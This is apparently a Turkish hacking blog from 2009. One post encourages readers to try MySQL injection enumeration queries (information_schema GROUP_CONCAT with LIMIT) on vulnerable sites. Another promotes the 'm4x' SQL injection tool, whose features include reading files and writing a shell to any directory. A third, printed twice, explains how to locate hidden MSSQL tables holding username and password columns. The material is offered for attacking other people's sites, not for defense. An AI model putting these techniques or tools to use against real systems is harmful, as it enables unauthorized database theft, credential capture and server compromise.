Yeni Mysql Injection teknigi . Pratik için deneme yapabilirsiniz arkadaslar mesela Sql açigi olan bir siteye bu kodu uygulayarak baslayabilirsiniz ; SELECT CONCAT(TABLO_ADI,’>’,GROUP_CONCAT(KOLON_ADI)) FROM information_schema.columns …
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 2,1
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 3,1
SELECT CONCAT(table_name,’>’,GROUP_CONCAT(column_name)) FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT n,1
22 Ağustos 2009 Cumartesi
3 Ağustos 2009 Pazartesi
m4x sql injection tools download
Download m4x Sql Injection Tools
m4x mysql injector demonstration (Nasıl kullanılır video)
m4x mssql injector demonstration (Nasıl kullanılır video)
- Standart methodların aksine farklı bir yöntem kullanıldığı için m4x mysql injector benzer uygulamaların aksine çok daha hızlı çalışmaktadır.
- Kullanıcı seçimine bağlı olarak proxy özelliği vardır.
- Veriler aynı Database management sistemleri veya scriptlerinde olduğu gibi birebir çekilmektedir.
- Treeview kontrolü kullanıldığı için listeleme işlemlerinizi oldukça kolay yapabilirsiniz.
- Veriler listelenirken istenilirse limit belirtilir o limit kadar veri çekilir.
- Verileri ister sondan(desc) ister baştan (asc) olarak çekebilirsiniz.
- Verileri çekerken progressbar sayesinde işlemin ne kadar kaldığını görebilirsiniz.
- Çektiğiniz verileri excele aktararak kolaylıkla yönetebilirsiniz.
For English explaination click below link
- m4x mysql injector more faster than similar programs because it uses different methods
- It has proxy selection according to user choice.
- Datas getting one to one like the other database management systems or scripts.
- You can make your listing process faster because it's include Treeview control
- It's include data limit.It's mean you can get data with what you decide about that
- You can get datas from end(desc) or from start(asc)
- You can see how much time left to end process with progressbar.
- You can export your datas to Microsoft Excel
- If you want do your half work later you can do it easyly with saving your database
- If the m4x mysql injector have database user's permissions, you can execute load_file, into outfile and into dumpfile functions.You can read file which do you want with load file
and you can write your shell to directory which do you want with into out - It doesn't affect with Magic Quotes Gpc.It doesn't matter on or off
m4x mysql injector demonstration (How to use video)
m4x mssql injector demonstration (How to use video)
H4ckinger AND Rmx İkinizinde elinize sağlık teşekkürler.
Devamını okumak için tıklayın
MSSQL de Gizli Tablolar
mssql de sysobjectse ulaşmak demek her tablo adına ulaşmak demek değildir.
db admin bazı tabloların sysobjectsde görünmemesini sağlayabilir fakat bu tabloyu okuyamayacağınız manasına gelmez.
misal "select top 1 name from sysobjects where name like '%admin%'" yazdığınızda admin tablosunu vermez fakat "select top 1 asd from admin" yazdığınızda asd diye column bulunamadı, ki bu admin tablosu doğru fakat kolon yanlış demektir.
yani admin tablosu var fakat sysobjects de görünmüyor. peki bu gizli tabloları nasıl çekebiliriz. bilginin gizliliği prensibim olduğu için kodu vermeyeceğim fakat mantığını anlatabilirim.
db admini tablo adlarını saklasa bile kolon adlarını saklayamaz veya saklamaz diyelim, çünkü kolon adlarından yola çıkılacağını hesaplamaz.
peki napabiliriz? syscolumns dan yola çıkıp username password gibi kolonları bulup sonra bu kolon adlarını doğru sql cümlesinde kullanarak o kolon adının tablosunu öğrenebiliriz. tablo sysobjects de görünmese bile biz adını öğrendikten sonra bi önemi yoktur ;)
db admin bazı tabloların sysobjectsde görünmemesini sağlayabilir fakat bu tabloyu okuyamayacağınız manasına gelmez.
misal "select top 1 name from sysobjects where name like '%admin%'" yazdığınızda admin tablosunu vermez fakat "select top 1 asd from admin" yazdığınızda asd diye column bulunamadı, ki bu admin tablosu doğru fakat kolon yanlış demektir.
yani admin tablosu var fakat sysobjects de görünmüyor. peki bu gizli tabloları nasıl çekebiliriz. bilginin gizliliği prensibim olduğu için kodu vermeyeceğim fakat mantığını anlatabilirim.
db admini tablo adlarını saklasa bile kolon adlarını saklayamaz veya saklamaz diyelim, çünkü kolon adlarından yola çıkılacağını hesaplamaz.
peki napabiliriz? syscolumns dan yola çıkıp username password gibi kolonları bulup sonra bu kolon adlarını doğru sql cümlesinde kullanarak o kolon adının tablosunu öğrenebiliriz. tablo sysobjects de görünmese bile biz adını öğrendikten sonra bi önemi yoktur ;)
Kaydol:
Kayıtlar (Atom)
